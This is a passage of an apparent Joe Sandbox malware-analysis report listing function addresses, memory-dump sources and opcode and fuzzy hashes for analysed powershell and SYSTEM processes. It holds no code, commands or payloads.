                                                                  Function 00007FFD9B7DA0FB Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2233519662.00007FFD9B7D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D5000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b7d5000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4c0667e766d07fbb2ea6324c1badd4e8199f9feb3931c9b6061b9bcb87eb9b4c
                                                                  • Instruction ID: ac064c72048c02b8a807f057b22239389818d5d77aaab00756d8ee94e6e90c80
                                                                  • Opcode Fuzzy Hash: 4c0667e766d07fbb2ea6324c1badd4e8199f9feb3931c9b6061b9bcb87eb9b4c
                                                                  • Instruction Fuzzy Hash: 95F0F036619A8C4FCB51EF6C98690D4BFA0FFA5211B0602BBE548C7031EB618A48C7C2
                                                                  Function 00007FFD9B8A414D Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2235041699.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c4c70660204a90eba2f273624a555d45041b4bf761b64c45811f1f51669d767b
                                                                  • Instruction ID: fc933e216132dc57d11c64c28e62d1d1a15bfadcf807bd4e47804876744133bc
                                                                  • Opcode Fuzzy Hash: c4c70660204a90eba2f273624a555d45041b4bf761b64c45811f1f51669d767b
                                                                  • Instruction Fuzzy Hash: CEF0BE32B0E5098FDB68EB8CE4518E877E0EF5932071600BAE06DC71B3CA25EC40C750
                                                                  Function 00007FFD9B8A4400 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2235041699.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9fe70f29f81e2a98a59987353451e05bcf5a23f250848bc51660d059a0cdf7de
                                                                  • Instruction ID: 41e09071fc46ab71516c80e63cb6b1b07efa8acff1174afbf2d0f5290fa3d757
                                                                  • Opcode Fuzzy Hash: 9fe70f29f81e2a98a59987353451e05bcf5a23f250848bc51660d059a0cdf7de
                                                                  • Instruction Fuzzy Hash: 3EF05E32B0F5498FDB68EB5CE4618A877E0FF4932475600BAE169CB4A3DA29BC44C750
                                                                  Function 00007FFD9B8A41D1 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2235041699.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: 09323d83657ad24737761ed45f903d87c673e9f131c1b1bb4a609df375895b1c
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: D7E01A31B0C8088FDA78DB4CE0519A977E1EBA832171601BBD14EC7571CA22ED518B90

                                                                  Non-executed Functions

                                                                  Function 00007FFD9B7D8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2233519662.00007FFD9B7D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D5000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b7d5000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                  • API String ID: 0-2388461625
                                                                  • Opcode ID: 9fbcb04bfe035fe85d9bc315c2e0a04bc0a348d1a00b88d828a9925e65419bb9
                                                                  • Instruction ID: 79cce54cdb1bb4ab17fa38f3220a3fc588b67c58b22875dadc209c7226430fe4
                                                                  • Opcode Fuzzy Hash: 9fbcb04bfe035fe85d9bc315c2e0a04bc0a348d1a00b88d828a9925e65419bb9
                                                                  • Instruction Fuzzy Hash: 29212277E085614AC30677BCBD659DC2B91DB9437935A42F3E228CF193CD24A48B8682

                                                                  Executed Functions

                                                                  Function 00007FFD9B7F0FE2 Relevance: .8, Instructions: 799COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.2310942018.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 54beabdc6f9afb62f877cb19d4aab8ee1c6c9278239c3ab6a8865754bef360c9
                                                                  • Instruction ID: 48644636639e732c0093e7ef8fb95798c5b2b40a226edebe755f6bd3a4c3f919
                                                                  • Opcode Fuzzy Hash: 54beabdc6f9afb62f877cb19d4aab8ee1c6c9278239c3ab6a8865754bef360c9
                                                                  • Instruction Fuzzy Hash: A6220821F19A8D4BE768FB785479ABC7BD2EF98304F4546B9E04DC32E7DD2868018781
                                                                  Function 00007FFD9B7F10D0 Relevance: .8, Instructions: 772COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.2310942018.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9d0de5c027e9201c59bf73841eac25324ecfc10b6e22ff2ee49e0eeeb99a93ea
                                                                  • Instruction ID: 73a5c636e0841fe90702700af6cf4424b59a7d5de8232c74ebf104c8d12453da
                                                                  • Opcode Fuzzy Hash: 9d0de5c027e9201c59bf73841eac25324ecfc10b6e22ff2ee49e0eeeb99a93ea
                                                                  • Instruction Fuzzy Hash: 8E229721B19B494FE798FB7848796BD7BD2FF98304F4506B9E04DC32E6DD28A8418781
                                                                  Function 00007FFD9B7F1068 Relevance: .7, Instructions: 744COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.2310942018.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bfec0254f17e33ea35e3f96a2860ba3cbeacc6c6cf3716bef3b3de814486993
                                                                  • Instruction ID: fb3156a9891fd1756089becaa14d1659216e9d37f97e13fdd10371d21c32423b
                                                                  • Opcode Fuzzy Hash: 9bfec0254f17e33ea35e3f96a2860ba3cbeacc6c6cf3716bef3b3de814486993
                                                                  • Instruction Fuzzy Hash: 7412B721B19A4D4BE7A8FB784479ABD7BD2EF98304F4546B9E04DC32E7DD2868018781
                                                                  Function 00007FFD9B7F0E78 Relevance: .5, Instructions: 504COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.2310942018.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2f3a4d7f0afb0bc190f6ec5e83db24212037de7197c192d48b2ed37b09057ab1
                                                                  • Instruction ID: f9a041511254baa2fede282e863c646315d957a91e800db5c65f357b8c38b9f2
                                                                  • Opcode Fuzzy Hash: 2f3a4d7f0afb0bc190f6ec5e83db24212037de7197c192d48b2ed37b09057ab1
                                                                  • Instruction Fuzzy Hash: 04D15836F0969D4BD764FB78A839AFD3BA1EF84328B4546B9E05DC71E7DC1868018780
                                                                  Function 00007FFD9B7F0C3E Relevance: .2, Instructions: 176COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.2310942018.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9d663fff42ca62f0242d26f71b55dc1de5c356a9db352b3c6f5f78f358749397
                                                                  • Instruction ID: 385373c50887456139dffa32a599dbfd32e9ce7e7fac5c1b5384cbde457237af
                                                                  • Opcode Fuzzy Hash: 9d663fff42ca62f0242d26f71b55dc1de5c356a9db352b3c6f5f78f358749397
                                                                  • Instruction Fuzzy Hash: 79511520B0E68A0FE756AB3888656B57FE1DF8621474901FBD48DC72EBCD1CAC468352
                                                                  Function 00007FFD9B7F0AD1 Relevance: .1, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.2310942018.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 74861c5b6bcaabd9c38614c637be1b4ed299d2d5a82303e58ee00a8be350ec2b
                                                                  • Instruction ID: 879d763f58f6b617892d41a78e4adf72bebd74b2930531c2375b81262c93e0eb
                                                                  • Opcode Fuzzy Hash: 74861c5b6bcaabd9c38614c637be1b4ed299d2d5a82303e58ee00a8be350ec2b
                                                                  • Instruction Fuzzy Hash: 40310921F19A4A4FE744BFBC48696BC77E2EF98715F0503B6E01CC32E6DE2858018392
                                                                  Function 00007FFD9B7F0985 Relevance: .1, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.2310942018.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 857e6bd355664128a9dad37ebb6e962d63031bc35d41d09d2285bc3ebcbf4419
                                                                  • Instruction ID: 07a0138af37351b2ef764beed286592537d96cc9ca35ea19d15ed8e4c4f24f69
                                                                  • Opcode Fuzzy Hash: 857e6bd355664128a9dad37ebb6e962d63031bc35d41d09d2285bc3ebcbf4419
                                                                  • Instruction Fuzzy Hash: 6031B434B19A4D8FDB48EB68C475AADBBA2FF98300F5145B4D009D33D6CE3864458751
                                                                  Function 00007FFD9B7F1B49 Relevance: .1, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.2310942018.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c37ab0fa438e52d8e5d82164372b4fedb903ec114b85f41df37df945edd67bd2
                                                                  • Instruction ID: cdd46bd8052e40f97145d2938902395ad05267b5d1a7b3e68c780afbe5872329
                                                                  • Opcode Fuzzy Hash: c37ab0fa438e52d8e5d82164372b4fedb903ec114b85f41df37df945edd67bd2
                                                                  • Instruction Fuzzy Hash: F4218220B1C9494FD788EF2C946A778B6C2EF98305F0545BEA05EC32EBDD689C418745
                                                                  Function 00007FFD9B7F0855 Relevance: .1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.2310942018.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 87237e95a380546650ab54c40e1280ffaa5ad771ad00d19af38a71f446728f54
                                                                  • Instruction ID: cea444fe38d47a895e4173f328274305ad964669ce08605276c12873c9f93347
                                                                  • Opcode Fuzzy Hash: 87237e95a380546650ab54c40e1280ffaa5ad771ad00d19af38a71f446728f54
                                                                  • Instruction Fuzzy Hash: 0731E434719A8D8FD389EB2884B4DA97F76EFC9204B8244E5D408C73DFCD285909C761
                                                                  Function 00007FFD9B7F1C41 Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.2310942018.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 34614a89778e20c9311170b52f712ece87bc0a0499c1f47f930944c32d7e4ee9
                                                                  • Instruction ID: 2fa796e4d90222231655e87531389e19bfedc9243d2e922b3c14b5484ee7977b
                                                                  • Opcode Fuzzy Hash: 34614a89778e20c9311170b52f712ece87bc0a0499c1f47f930944c32d7e4ee9
                                                                  • Instruction Fuzzy Hash: E7012B65B0EB850FE765A7385875475BFE1CF91210B0905ABE888C61F7EC086A45C3D6

                                                                  Non-executed Functions

                                                                  Function 00007FFD9B7F06FA Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.2310942018.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <M_^$=M_^$M_^j$M_^p
                                                                  • API String ID: 0-3547729567
                                                                  • Opcode ID: 94bde1aa506ee9daf63da347d970920297bbcdf60167c394250fa25fe49f358e
                                                                  • Instruction ID: 437c6c835e2d4413b3a321e204eb7f50774393548620ce426e0885ba3bfb9231
                                                                  • Opcode Fuzzy Hash: 94bde1aa506ee9daf63da347d970920297bbcdf60167c394250fa25fe49f358e
                                                                  • Instruction Fuzzy Hash: 14318FABF0D59A89E61276EC64665EC3B909F8073971B83F2C07DCA2E3DC14304645E5

                                                                  Executed Functions

                                                                  Function 00007FFD9B7E0E00 Relevance: 1.1, Instructions: 1062COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7a41bc6f4aead5d8b984ad805c8635cfa8a5db69a5dc19b48925cb8341eab774
                                                                  • Instruction ID: 869cfe060a32a570ce25c1a839936cf96072303667f5f69ae6af1f9363e69c21
                                                                  • Opcode Fuzzy Hash: 7a41bc6f4aead5d8b984ad805c8635cfa8a5db69a5dc19b48925cb8341eab774
                                                                  • Instruction Fuzzy Hash: 28523626F19A8A0BE768FB7C547AAFD77E1EF84314B4545B9E04DC32E7CD2868018781
                                                                  Function 00007FFD9B7E0FE2 Relevance: .8, Instructions: 809COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e4d591c7d0e1b085ca9c75179f70af1b9ad599968a000954ffea19f8a84e3f5c
                                                                  • Instruction ID: d8bc86b79ec4e05de899feb0829b5b07d5e9da68cf62238924d08db2c23f87e7
                                                                  • Opcode Fuzzy Hash: e4d591c7d0e1b085ca9c75179f70af1b9ad599968a000954ffea19f8a84e3f5c
                                                                  • Instruction Fuzzy Hash: 7A22E521F19A494BE7A8FB685476ABC77E2EF88314F4545B9E04DC32FBDD2868018781
                                                                  Function 00007FFD9B7E10D0 Relevance: .8, Instructions: 772COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fbf870c759b9e45c80f5f68f9ba7923fe93fc0d65348923bd2fe42f0c897c79b
                                                                  • Instruction ID: a00433d6f99517f6a09a10b9551b3bb009fc363ee4d1aa6d3e8717ae44f3cebd
                                                                  • Opcode Fuzzy Hash: fbf870c759b9e45c80f5f68f9ba7923fe93fc0d65348923bd2fe42f0c897c79b
                                                                  • Instruction Fuzzy Hash: BA22B720B19A494FE798FB78447A6B977E2FF98714F450579E04EC32FBDE28A8018741
                                                                  Function 00007FFD9B7E1068 Relevance: .8, Instructions: 750COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ca87ac3d295152ad723bfa09e8e45a63fb7d02bcf7e07cdd83933b29886da9d4
                                                                  • Instruction ID: acd76dba7f88819f08bb5cd383f424e61e5c1853e2c5ba5d59ffb747ab705033
                                                                  • Opcode Fuzzy Hash: ca87ac3d295152ad723bfa09e8e45a63fb7d02bcf7e07cdd83933b29886da9d4
                                                                  • Instruction Fuzzy Hash: EC22F621B19A4D4BE7A8FB78447AABC77E2EF98714F4505B9E04DC32FBDD2868018741
                                                                  Function 00007FFD9B7E0C3E Relevance: .2, Instructions: 176COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f7fc962fb4499aa838e6c3649887e88fba1681fd2942561d2e47e21545315b85
                                                                  • Instruction ID: 4f36e2ee215e9d09d5e7a0e0fe9bfc90bb3b6e7a7be3cc2afb8e4599bebfdaee
                                                                  • Opcode Fuzzy Hash: f7fc962fb4499aa838e6c3649887e88fba1681fd2942561d2e47e21545315b85
                                                                  • Instruction Fuzzy Hash: 52512620B0E78A0FE756AB7888666B53BE1DF8621474901FBD08DC71FBCD1CAC428352
                                                                  Function 00007FFD9B7E0AD1 Relevance: .1, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a8ccce30f4e89ddd77d02043c1478ca306c9a7c0685899aa663d8fecca7a2ce
                                                                  • Instruction ID: df26e4a8cec3046f570515632c90a34925ecb00c5805b2ab90ef5325df709357
                                                                  • Opcode Fuzzy Hash: 4a8ccce30f4e89ddd77d02043c1478ca306c9a7c0685899aa663d8fecca7a2ce
                                                                  • Instruction Fuzzy Hash: EB310911F18A494FEB44BBBC586A7BD77E2EF98715F0502B6E00CC32E7DE2858018392
                                                                  Function 00007FFD9B7E0985 Relevance: .1, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9aee4e827ac141f231997a3b8df4dffb74c5bd846a1d8e49ef34c1b00b781b95
                                                                  • Instruction ID: 43985037066eb342cb6d4069d8a8edd5eb7da795fbaf04cf5c1a4fd14259868b
                                                                  • Opcode Fuzzy Hash: 9aee4e827ac141f231997a3b8df4dffb74c5bd846a1d8e49ef34c1b00b781b95
                                                                  • Instruction Fuzzy Hash: F5319134B19A4D8FDB48EBA8C465AADB7A2FF98311F5145B9D009D32DACE3868018751
                                                                  Function 00007FFD9B7E1B49 Relevance: .1, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ff4866b3da3187588dbffdad3b7037f712896a00b746d989ae926e63a29e37af
                                                                  • Instruction ID: 9cdd809ac0421dc018874f94567ad1d2688480520567cfe705e021ad58b03c90
                                                                  • Opcode Fuzzy Hash: ff4866b3da3187588dbffdad3b7037f712896a00b746d989ae926e63a29e37af
                                                                  • Instruction Fuzzy Hash: A5215220B1C9494FD788EF6C946A778B2C2EF98315F4545BEA05EC32EBDD68AC418741
                                                                  Function 00007FFD9B7E0855 Relevance: .1, Instructions: 82COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e553f64de85dc406b5cd47a167e769b960a8bfdc1e659c3d7c0f441fddcbb86
                                                                  • Instruction ID: 1f4a0be5362e269fe767059b354548fe82bcf6a0a1afac61d9d0fab7fed392a9
                                                                  • Opcode Fuzzy Hash: 0e553f64de85dc406b5cd47a167e769b960a8bfdc1e659c3d7c0f441fddcbb86
                                                                  • Instruction Fuzzy Hash: 01310174748A8D8FD388EB2880A4DADBF62AFC9225B8148E9D418D73DFCD3C5901C761
                                                                  Function 00007FFD9B7E1C41 Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e3b9b23995761c4b006e337b99b0f1d1b4c798e9109858d00a8e824fec26a019
                                                                  • Instruction ID: 1a3a1c7bb0f0bff9c87272356b25c171aaaa51faadcf2f575b91fa859aa4c712
                                                                  • Opcode Fuzzy Hash: e3b9b23995761c4b006e337b99b0f1d1b4c798e9109858d00a8e824fec26a019
                                                                  • Instruction Fuzzy Hash: 6B017654A0EB890FE365A6385876471BFE1CFD6210B0901ABE88CC61F7E808AA448392

                                                                  Non-executed Functions

                                                                  Function 00007FFD9B7E06FA Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <N_^$=N_^$N_^j$N_^p
                                                                  • API String ID: 0-2936155160
                                                                  • Opcode ID: 0df6d2afe4ec58165106d27296bf85d81256365d4a325b4d8c97cef035abf6b5
                                                                  • Instruction ID: 1291cb9629d4be3418f3983f6a397094e2b3d3216c73efc85c66cc911c0368b9
                                                                  • Opcode Fuzzy Hash: 0df6d2afe4ec58165106d27296bf85d81256365d4a325b4d8c97cef035abf6b5
                                                                  • Instruction Fuzzy Hash: E9315DABF4E55A0AE31272EC68765EC37909F8073971A8572C2ADDA1F3CC1430464692

                                                                  Executed Functions

                                                                  Function 00007FFD9B7F0FE2 Relevance: .8, Instructions: 799COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7547470955abf1a9ca69ed2df63400d524b2719175600e6923d077e96716f281
                                                                  • Instruction ID: 8b2641a206e1cbd7f0ed8c92ced4ea65b250a4a87e5515e53923e2cb1d301185
                                                                  • Opcode Fuzzy Hash: 7547470955abf1a9ca69ed2df63400d524b2719175600e6923d077e96716f281
                                                                  • Instruction Fuzzy Hash: 6F220721F19A894BE768FB6C5479ABC7BD1EF94314F4546B9E04DC32E7DD28A8014381
                                                                  Function 00007FFD9B7F10D0 Relevance: .8, Instructions: 772COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2c246bbcca690dd739408cf9f853f39ca7a7befeddbd80d68ac735ba936130b3
                                                                  • Instruction ID: b5207b5842d027ebaa3c3eeac7e5b8aa630748c668a951d40326cf0e8387fcb6
                                                                  • Opcode Fuzzy Hash: 2c246bbcca690dd739408cf9f853f39ca7a7befeddbd80d68ac735ba936130b3
                                                                  • Instruction Fuzzy Hash: AB22D760B19B494FE798EB7C84796BD7BD1FF98310F4505B9E04EC32E6DD28A8018781
                                                                  Function 00007FFD9B7F1068 Relevance: .7, Instructions: 744COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
